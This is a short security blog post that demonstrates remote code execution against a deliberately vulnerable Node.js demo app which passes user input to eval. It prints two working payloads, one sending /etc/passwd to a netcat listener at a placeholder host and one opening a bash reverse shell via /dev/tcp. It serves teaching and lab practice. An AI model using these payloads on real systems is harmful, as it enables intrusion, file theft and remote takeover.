Nodejs and a simple RCE exploit

Riyaz Walikar

·

Follow

Published in

Appsecco

·

·

Aug 24, 2016

2 min read

—

While reading the blog post on a RCE on demo.paypal.com by @artsploit, I wanted to build a simple nodejs app that I could use to demo remote code execution.

I built a simple app, vulnerable to command injection/execution via the usage of eval. The exploit code is passed to eval and executed. A simple exploit code could be the following (output in article header):

/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

This will send the contents of /etc/passwd to a netcat listener running on a machine you control and accessible to the nodejs server.

A quick reverse shell can also be obtained using:

/?q=require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')

This will send a reverse shell back to your machine and you get a proper shell.

reverse shell obtained to a netcat listener

Full details of the code and exploit are available here. The app is also available as a docker image. To setup and run use:

docker run -p 8080:8080 -d appsecco/node-simple-rce

And as is with other cool things in the world, the code is available on Github as well.

Happy hacking!!